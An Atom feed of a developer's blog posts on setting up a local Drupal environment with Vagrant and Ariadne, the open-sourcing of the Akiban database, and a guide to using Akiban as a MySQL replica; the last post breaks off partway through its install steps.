<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
 
 <title>Padraig O'Sullivan</title>
 <link href="http://posulliv.github.com/atom.xml" rel="self"/>
 <link href="http://posulliv.github.com"/>
 <updated>2013-05-13T12:33:43-07:00</updated>
 <id>http://posulliv.github.com</id>
 <author>
   <name>Padraig O'Sullivan</name>
   <email>osullivan.padraig@gmail.com</email>
 </author>

 
 <entry>
   <title>Local Development with Ariadne</title>
   <link href="http://posulliv.github.com/2013/05/13/ariadne"/>
   <updated>2013-05-13T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2013/05/13/ariadne</id>
   <content type="html">&lt;p&gt;I recently started a new development position with &lt;a href='http://www.blinkreaction.com/'&gt;Blink Reaction&lt;/a&gt; so I needed to get somewhat serious about setting up a local Drupal development environment.&lt;/p&gt;

&lt;h2 id='ariadne'&gt;Ariadne&lt;/h2&gt;

&lt;p&gt;I was leaning towards using &lt;a href='http://www.vagrantup.com/'&gt;Vagrant&lt;/a&gt; to manage local development environments so I can easily switch between different projects or branches. I also believe Vagrant makes it easier to mirror production as closely as possible locally.&lt;/p&gt;

&lt;p&gt;I discovered a very interesting project from &lt;a href='http://myplanetdigital.com/'&gt;MyPlanet Digital&lt;/a&gt; named &lt;a href='https://github.com/myplanetdigital/vagrant-ariadne'&gt;vagrant-ariadne&lt;/a&gt;. Ariadne is a customized Vagrant setup that allows easy deployment of Drupal installation profiles to a local VM. Another nice feature is that it attempts to emulate Acquia&amp;#8217;s infrastructure, which is useful as a lot of Blink&amp;#8217;s clients are deployed on the Acquia Cloud.&lt;/p&gt;

&lt;p&gt;Assuming you have Vagrant, RVM, and a Ruby environment installed on your workstation, installing Ariadne is pretty straightforward:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;vagrant gem install vagrant-vbguest vagrant-hostmaster vagrant-librarian&lt;/span&gt;
&lt;span class='go'&gt;[sudo] gem install librarian rake knife-solo&lt;/span&gt;
&lt;span class='go'&gt;git clone https://github.com/myplanetdigital/vagrant-ariadne.git&lt;/span&gt;
&lt;span class='go'&gt;cd vagrant-ariadne&lt;/span&gt;
&lt;span class='go'&gt;bundle install&lt;/span&gt;
&lt;span class='go'&gt;bundle exec rake setup&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Everything is now configured to boot a VirtualBox VM. Ariadne comes with a simple example that can be deployed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;project=example vagrant up&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once that command finishes running, the site can be viewed at &lt;code&gt;http://example.dev/&lt;/code&gt; (Ariadne uses &lt;a href='https://github.com/mosaicxm/vagrant-hostmaster'&gt;vagrant-hostmaster&lt;/a&gt; for managing &lt;code&gt;/etc/hosts&lt;/code&gt; entries).&lt;/p&gt;
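&lt;p&gt;For illustration (the exact comment markers vagrant-hostmaster writes may differ), the resulting entry on the host points the project hostname at the VM&amp;#8217;s private IP, something like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;33.33.33.10  example.dev&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;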

&lt;p&gt;A more involved example is the cookbook for deploying the &lt;a href='https://github.com/wet-boew/wet-boew-drupal'&gt;Web Experience Toolkit&lt;/a&gt;, which is also &lt;a href='https://github.com/patcon/ariadne-wet-boew-drupal'&gt;available on GitHub&lt;/a&gt;. If we wanted to deploy the master branch of that site, we could do:&lt;/p&gt;

&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;bundle exec rake &amp;quot;init_project[https://github.com/patcon/ariadne-wet-boew-drupal]&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;project=wet-boew-drupal branch=master vagrant up&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;And that&amp;#8217;s it!&lt;/p&gt;

&lt;p&gt;Another nice feature of these deployed environments is that they are configured to allow remote debugging (relevant when setting up an IDE, as covered later) and the actual site code is shared as an NFS mount. For example, the contents of my &lt;code&gt;/etc/exports&lt;/code&gt; file after booting a box with Ariadne look like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;#&lt;/span&gt; VAGRANT-BEGIN: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/tmp/apt/cache&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/tmp/drush/cache&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/data/html&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='gp'&gt;#&lt;/span&gt; VAGRANT-END: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Thus, if I navigate to the &lt;code&gt;~/vagrant-ariadne/data/html&lt;/code&gt; directory or import it into my IDE, I can edit the code deployed on the Vagrant box directly.&lt;/p&gt;

&lt;h3 id='drupal_core_from_git'&gt;Drupal Core from git&lt;/h3&gt;

&lt;p&gt;Another use I&amp;#8217;ve found for Ariadne is building a local environment for the latest Drupal core. To accomplish this, I created a role file named &lt;code&gt;roles/core.rb&lt;/code&gt; with the following contents:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;core&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;description&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Install requirements to run Drupal core.&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;run_list&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[mysql::server]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[mysql::client]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_mysql]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_curl]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_gd]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_apc]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[drush::utils]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[drush::make]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::write_inis]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
&lt;span class='o'&gt;]&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='n'&gt;default_attributes&lt;/span&gt;&lt;span class='p'&gt;({&lt;/span&gt;
  &lt;span class='ss'&gt;:drush&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
    &lt;span class='ss'&gt;:version&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;5.8.0&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='p'&gt;},&lt;/span&gt;
  &lt;span class='ss'&gt;:mysql&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
    &lt;span class='ss'&gt;:server_debian_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:server_root_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:server_repl_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:bind_address&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;127.0.0.1&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:tunable&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
      &lt;span class='ss'&gt;:key_buffer&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;384M&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
      &lt;span class='ss'&gt;:table_cache&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;4096&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='p'&gt;},&lt;/span&gt;
  &lt;span class='p'&gt;},&lt;/span&gt;
&lt;span class='p'&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;Next, I created a new cookbook named &lt;code&gt;core&lt;/code&gt; with a simple &lt;code&gt;default.rb&lt;/code&gt; recipe. The recipe looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='n'&gt;branch&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;branch&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;

&lt;span class='n'&gt;git&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;/mnt/www/html/drupal&amp;quot;&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;user&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;repository&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://git.drupal.org/project/drupal.git&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;reference&lt;/span&gt; &lt;span class='n'&gt;branch&lt;/span&gt;
  &lt;span class='n'&gt;enable_submodules&lt;/span&gt; &lt;span class='kp'&gt;true&lt;/span&gt;
  &lt;span class='n'&gt;action&lt;/span&gt; &lt;span class='ss'&gt;:sync&lt;/span&gt;
  &lt;span class='n'&gt;notifies&lt;/span&gt; &lt;span class='ss'&gt;:run&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;bash[Installing Drupal...]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='ss'&gt;:immediately&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;

&lt;span class='n'&gt;bash&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Installing Drupal...&amp;quot;&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;user&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;group&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;code&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class='no'&gt;EOH&lt;/span&gt;
&lt;span class='sh'&gt;    drush -y si \&lt;/span&gt;
&lt;span class='sh'&gt;      --root=/mnt/www/html/drupal \&lt;/span&gt;
&lt;span class='sh'&gt;      --db-url=mysqli://root:root@localhost/drupal \&lt;/span&gt;
&lt;span class='sh'&gt;      --site-name=&amp;quot;Drupal Core Installed from Git&amp;quot; \&lt;/span&gt;
&lt;span class='sh'&gt;      --site-mail=vagrant+site@localhost \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-mail=vagrant+admin@localhost \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-name=admin \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-pass=admin&lt;/span&gt;
&lt;span class='no'&gt;  EOH&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;

&lt;span class='n'&gt;site&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;host_name&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;].&lt;/span&gt;&lt;span class='n'&gt;nil?&lt;/span&gt; &lt;span class='p'&gt;?&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;&lt;/span&gt;&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;project&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt;.dev&amp;quot;&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;host_name&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;

&lt;span class='n'&gt;web_app&lt;/span&gt; &lt;span class='n'&gt;site&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;cookbook&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;ariadne&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;template&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;drupal-site.conf.erb&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;port&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;apache&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;listen_ports&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;].&lt;/span&gt;&lt;span class='n'&gt;to_a&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;
  &lt;span class='n'&gt;server_name&lt;/span&gt; &lt;span class='n'&gt;site&lt;/span&gt;
  &lt;span class='n'&gt;server_aliases&lt;/span&gt; &lt;span class='o'&gt;[&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;www.&lt;/span&gt;&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='n'&gt;site&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;]&lt;/span&gt;
  &lt;span class='n'&gt;docroot&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;/mnt/www/html/drupal&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;notifies&lt;/span&gt; &lt;span class='ss'&gt;:reload&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;service[apache2]&amp;quot;&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With all of the above in place, it&amp;#8217;s quite simple to create a local VM based on the latest code in the &lt;code&gt;7.x&lt;/code&gt; branch of Drupal core:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;project&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;core &lt;span class='nv'&gt;branch&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;7.x vagrant up
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To deploy a different branch, simply modify the branch name in the above command. Once the command completes, a site will be available at &lt;code&gt;core.dev&lt;/code&gt; and I can log in as the &lt;code&gt;admin&lt;/code&gt; user using the credentials specified in my cookbook.&lt;/p&gt;
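&lt;p&gt;For instance, assuming an &lt;code&gt;8.x&lt;/code&gt; branch exists upstream, tracking Drupal 8 development instead is just:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;project=core branch=8.x vagrant up&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;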

&lt;h3 id='private_repositories'&gt;Private Repositories&lt;/h3&gt;

&lt;p&gt;Most client projects are stored in private repositories. Thankfully, that&amp;#8217;s not an issue with Ariadne. Ariadne uses agent forwarding to forward the host machine&amp;#8217;s SSH session into the VM, including keys and passphrases stored by ssh-agent. This means your VM has the same Git/SSH access that you enjoy on your local machine. I&amp;#8217;ve had no problems checking out code stored in private repositories on Bitbucket, for example.&lt;/p&gt;
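
&lt;p&gt;A quick way to sanity-check the forwarding is to confirm your key is loaded on the host and then test SSH access from inside the VM (using Bitbucket here as an example):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;ssh-add -l&lt;/span&gt;
&lt;span class='go'&gt;vagrant ssh&lt;/span&gt;
&lt;span class='go'&gt;ssh -T git@bitbucket.org&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;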

&lt;h2 id='ide'&gt;IDE&lt;/h2&gt;

&lt;p&gt;As for an IDE, I&amp;#8217;ve been an Eclipse user in the past for Java projects, so &lt;a href='http://www.aptana.org/'&gt;Aptana&lt;/a&gt; seemed like a good fit for my current needs. A few articles (&lt;a href='http://www.pixelite.co.nz/article/configuring-aptana-drupal-development'&gt;here&lt;/a&gt; and &lt;a href='http://knackforge.com/blog/vannia/setting-aptana-studio-3-ide-drupal-development'&gt;here&lt;/a&gt;) already cover configuring Aptana for Drupal development, so I&amp;#8217;m not going to go into too much detail.&lt;/p&gt;

&lt;p&gt;Installation is very straightforward with the binary downloaded from the &lt;a href='http://www.aptana.org/'&gt;site&lt;/a&gt;. A ruble exists for Drupal, so it&amp;#8217;s natural to install that (note the quoting, since the rubles directory contains a space):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;git clone git://github.com/arcaneadam/Drupal-Bundle-for-Aptana.git &amp;quot;$HOME/Documents/Aptana Rubles/Drupal-Bundle-for-Aptana&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The next item is to configure Aptana to adhere to the Drupal coding standards. I used an &lt;a href='https://github.com/fxarte/Aptana-Drupal-PHP.profile'&gt;existing profile for Aptana&lt;/a&gt; that can be imported for this.&lt;/p&gt;

&lt;p&gt;The final thing I needed to configure was a debug configuration. To do this, I created a new PHP web page configuration. First, a new PHP server needs to be added. In this example, let&amp;#8217;s assume I am using the example box I mentioned in the Ariadne section, whose hostname is &lt;code&gt;example.dev&lt;/code&gt;. The web server configuration dialog, when configured with this hostname and the appropriate directory for the site root, looks like:&lt;/p&gt;

&lt;p&gt;&lt;img src='/images/aptana_first.png' alt='image' /&gt;&lt;/p&gt;

&lt;p&gt;Once a PHP server has been added, the rest of the information to fill in for the debug configuration is pretty straightforward as shown below:&lt;/p&gt;

&lt;p&gt;&lt;img src='/images/aptana_second.png' alt='image' /&gt;&lt;/p&gt;

&lt;p&gt;I like to select the &amp;#8220;break at first line&amp;#8221; option to make sure the debug configuration works correctly.&lt;/p&gt;

&lt;p&gt;With this in place, any visit to &lt;code&gt;example.dev&lt;/code&gt; will result in the breakpoint being hit.&lt;/p&gt;
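
&lt;p&gt;For reference, remote debugging of this kind relies on Xdebug being enabled on the VM; settings along the following lines are what let the IDE receive the connection (illustrative values, so check what Ariadne actually provisions):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;xdebug.remote_enable=1&lt;/span&gt;
&lt;span class='go'&gt;xdebug.remote_connect_back=1&lt;/span&gt;
&lt;span class='go'&gt;xdebug.remote_port=9000&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;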

&lt;h2 id='conclusion'&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;I&amp;#8217;ve still not settled on this combination for my development environment, but I was definitely excited upon discovering the Ariadne project. The drawbacks that I see to using Ariadne are: 1) the need to create a cookbook for each project you want to work with, 2) the project is still in beta so documentation is fairly lacking (fair enough for a beta project though), and 3) if you are not familiar with &lt;a href='http://www.opscode.com/chef/'&gt;Chef&lt;/a&gt;, using Ariadne may prove challenging (although it provides the perfect excuse to become familiar with Chef).&lt;/p&gt;

&lt;p&gt;PhpStorm seems to be the popular choice when I ask what other people are using for an editor, but given the license fee associated with it, I didn&amp;#8217;t want to splurge on that just yet. Aptana works just fine for me and satisfies my needs nicely.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban is Now Open Source</title>
   <link href="http://posulliv.github.com/2013/04/02/akiban-open-source"/>
   <updated>2013-04-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2013/04/02/akiban-open-source</id>
   <content type="html">&lt;p&gt;I&amp;#8217;ve written a lot about the work I do for &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt; with Drupal in the past and many people would ask if Akiban was open source software. Well in the last few weeks we actually open sourced our &lt;a href='http://github.com/akiban/akiban-server'&gt;database server&lt;/a&gt;. We also have &lt;a href='http://software.akiban.com/releases/1.6.0/installers/'&gt;downloads&lt;/a&gt; for various platforms such as Windows and OSX besides binary packages for Linux variants.&lt;/p&gt;

&lt;p&gt;I &lt;a href='http://posulliv.github.com/2012/12/14/drupal-7-install-akiban/'&gt;wrote previously&lt;/a&gt; about how to install Drupal 7 completely on &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt;. You can still follow that post to get up and running, except there is now a tiny change to use our public repositories:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-public/ lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server postgresql-client&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
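&lt;p&gt;Since Akiban speaks the PostgreSQL wire protocol (which is why &lt;code&gt;postgresql-client&lt;/code&gt; is installed above), a quick smoke test once the install finishes is to connect with &lt;code&gt;psql&lt;/code&gt;; port 15432 is the Akiban SQL port used elsewhere in these posts, and a &lt;code&gt;test&lt;/code&gt; schema exists on a fresh server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;psql -h localhost -p 15432 test&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;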
&lt;p&gt;Some of the things included in our open source database are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href='http://docs.akiban.org/en/latest/service/spatial.html'&gt;spatial indexes&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href='http://docs.akiban.org/en/latest/service/fulltext.html'&gt;full text indexes&lt;/a&gt; (implemented using Lucene)&lt;/li&gt;

&lt;li&gt;&lt;a href='https://akiban.readthedocs.org/en/latest/service/restapireference.html'&gt;REST access&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href='https://akiban.readthedocs.org/en/latest/quickstart/nested.html'&gt;nested SQL&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We are also working on a hosted service offering for our database server, so there will be no need to manage an installation yourself. If you are interested in trying the service in its current beta form, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be happy to hook you up, or just visit our &lt;a href='http://akiban.com/'&gt;website&lt;/a&gt;. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;public mailing list&lt;/a&gt; for the Akiban project if you try anything out and have questions.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban as a MySQL Replica with Drupal 7</title>
   <link href="http://posulliv.github.com/2013/01/11/akiban-augment"/>
   <updated>2013-01-11T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/11/akiban-augment</id>
   <content type="html">&lt;p&gt;I &lt;a href='http://posulliv.github.com/2012/12/14/drupal-7-install-akiban/'&gt;previously wrote&lt;/a&gt; about how to install Drupal 7 completely on &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt;. However, this is not how our current customers are using us. The vast majority of all Drupal installations currently run on MySQL. What we at Akiban are currently aiming to do is to be deployed as a regular MySQL slave and if there are any queries that are problematic for MySQL, we work with customers to make sure those queries get executed by Akiban (and with a significant performance improvement).&lt;/p&gt;

&lt;p&gt;In this post, I wanted to cover how to set up Akiban as a MySQL slave and how a query is typically redirected to an Akiban server from Drupal. This article is specific to Drupal 7.&lt;/p&gt;

&lt;p&gt;First, I set up a regular Drupal install on Ubuntu 12.04 with MySQL 5.5.28. This is going to serve as the master server. Configuring replication in MySQL is pretty &lt;a href='http://dev.mysql.com/doc/refman/5.5/en/replication-howto.html'&gt;straightforward&lt;/a&gt;. The following needs to be placed in your &lt;code&gt;my.cnf&lt;/code&gt; file and MySQL needs to be restarted:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;log-bin=mysql-bin&lt;/span&gt;
&lt;span class='go'&gt;server-id=11&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A user needs to be created for replication:&lt;/p&gt;

&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;CREATE USER &amp;#39;repl&amp;#39;@&amp;#39;%&amp;#39; IDENTIFIED BY &amp;#39;password&amp;#39;;&lt;/span&gt;
&lt;span class='go'&gt;GRANT REPLICATION SLAVE ON *.* TO &amp;#39;repl&amp;#39;@&amp;#39;%&amp;#39;;&lt;/span&gt;
&lt;span class='go'&gt;FLUSH PRIVILEGES;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The next steps are to take a consistent snapshot of your Drupal schema with &lt;code&gt;mysqldump&lt;/code&gt; and to capture the output of &lt;code&gt;SHOW MASTER STATUS&lt;/code&gt; to get the appropriate binlog coordinates.&lt;/p&gt;
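&lt;p&gt;Something along these lines does the trick; the &lt;code&gt;--master-data=2&lt;/code&gt; flag also records the binlog coordinates as a comment at the top of the dump:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mysqldump -uroot -p --single-transaction --master-data=2 drupal &amp;gt; drupal.sql&lt;/span&gt;
&lt;span class='go'&gt;mysql -uroot -p -e &amp;quot;SHOW MASTER STATUS&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;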

&lt;p&gt;Next, we need to set up an Akiban MySQL slave. We will use an entirely separate instance for this purpose. First, the software to install on this slave is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y mysql-client mysql-server&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
